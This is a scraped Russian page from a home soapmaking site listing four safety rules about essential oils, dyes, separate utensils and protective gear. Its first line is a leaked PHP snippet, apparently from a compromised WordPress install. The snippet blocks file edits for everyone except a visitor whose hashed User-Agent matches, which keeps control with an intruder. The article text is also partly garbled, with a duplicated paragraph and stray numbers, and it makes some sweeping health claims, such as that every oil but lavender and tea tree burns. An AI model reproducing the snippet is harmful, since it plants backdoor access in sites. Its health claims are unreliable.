if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } 4 правила техники безопасности мыловарения, которые должен знать каждый мыловар | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

4 правила техники безопасности мыловарения, которые должен знать каждый мыловар

Каждая сфера человеческой деятельности накопила определенное количество правил и норм, соблюдение которых позволит не только сохранить здоровье, но иногда и жизнь работников производства. Мыловарение не является исключением

Каж­дая сфе­ра чело­ве­че­ской дея­тель­но­сти нако­пи­ла опре­де­лен­ное коли­че­ство пра­вил и норм, соблю­де­ние кото­рых поз­во­лит не толь­ко сохра­нить здо­ро­вье, но ино­гда и жизнь работ­ни­ков про­из­вод­ства. Мыло­ва­ре­ние не явля­ет­ся исклю­че­ни­ем. Выпол­не­ние тре­бо­ва­ний без­опас­ной орга­ни­за­ции тру­да поз­во­лит сде­лать мыло в домаш­них усло­ви­ях не доста­вив непри­ят­но­стей в виде травм и ожогов.

Пере­чис­лим основ­ные из них:

1. Следует соблюдать правила безопасности при работе с эфирными маслами

 

10

Преж­де все­го, сле­ду­ет чет­ко соблю­дать реко­мен­до­ван­ную дози­ров­ку, при­чем каж­дый вид мыла харак­те­ри­зу­ет­ся сво­им коли­че­ством эфир­ных масел, одна­ко на 100 г мыль­ной осно­вы не более 7–10 капель.

Нель­зя допус­кать попа­да­ния мас­ла на кожу и сли­зи­стые обо­лоч­ки. След­стви­ем может стать серьез­ный хими­че­ский ожог. Одна­ко, если непри­ят­ность все же слу­чи­лась, сле­ду­ет немед­лен­но про­те­реть кожу любым рас­ти­тель­ным мас­лом, после чего тща­тель­но про­мыть водой. Сле­ду­ет пом­нить, что ожо­ги могут вызы­вать все эфир­ные мас­ла, за исклю­че­ни­ем мас­ла лаван­ды и чай­но­го дерева.

При­сту­пая к изго­тов­ле­нию мыла в домаш­них усло­ви­ях не сле­ду­ет брать эфир­ное мас­ло с непри­ят­ным для вас запа­хом или вызы­ва­ю­щим аллер­ги­че­ские реакции.

2. Соблюдение правил работы с веществами-красителями

22

Для под­кра­ши­ва­ния мыль­ной осно­вы мож­но при­ме­нять кра­си­те­ли раз­лич­но­го про­ис­хож­де­ния: нату­раль­ные, искус­ствен­ные и син­те­ти­че­ские. Пред­ла­га­е­мые неко­то­ры­ми масте­ра­ми, гото­вя­щи­ми мыло сво­и­ми рука­ми, рецеп­ты содер­жат кра­си­те­ли для пас­халь­ных яиц. Одна­ко, не сле­ду­ет без­огляд­но дове­рять тому, что напи­са­но на упа­ков­ках, как пра­ви­ло, они име­ют син­те­ти­че­скую при­ро­ду, что не совсем полез­но для здо­ро­вья. Луч­ше поль­зо­вать­ся либо пище­вы­ми, либо кос­ме­ти­че­ски­ми кра­си­те­ля­ми или пиг­мен­та­ми. При­об­ре­сти их мож­но в мага­зи­нах спе­ци­а­ли­зи­ру­ю­щих­ся на про­да­же подоб­ных товаров.

Совер­шен­но дико зву­чат сове­ты по исполь­зо­ва­нию для окрас­ки мыла худо­же­ствен­ных кра­сок – туши или гуа­ши. Не вызы­ва­ет сомне­ния, что наша кожа не будет в вос­тор­ге от тако­го мыла.

Сле­ду­ет чет­ко при­дер­жи­вать­ся дози­ров­ки при вве­де­нии в мыло пиг­мен­тов и кра­си­те­лей. В про­тив­ном слу­чае яркая окрас­ка будет у вашей кожи или рако­ви­ны. Опас­но­сти для здо­ро­вья прак­ти­че­ски нет, но при­ят­но­го мало.

3. Выделить отдельную посуду

Преж­де чем делать мыло в домаш­них усло­ви­ях сле­ду­ет выде­лить отдель­ную посу­ду, не пред­на­зна­чен­ную в даль­ней­шем для при­го­тов­ле­ния пищи.

4. Обязательно работать в перчатках!

Обя­за­тель­ное усло­вие – исполь­зо­ва­ние таких средств защи­ты, как пер­чат­ки, респи­ра­тор и халат.

50


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!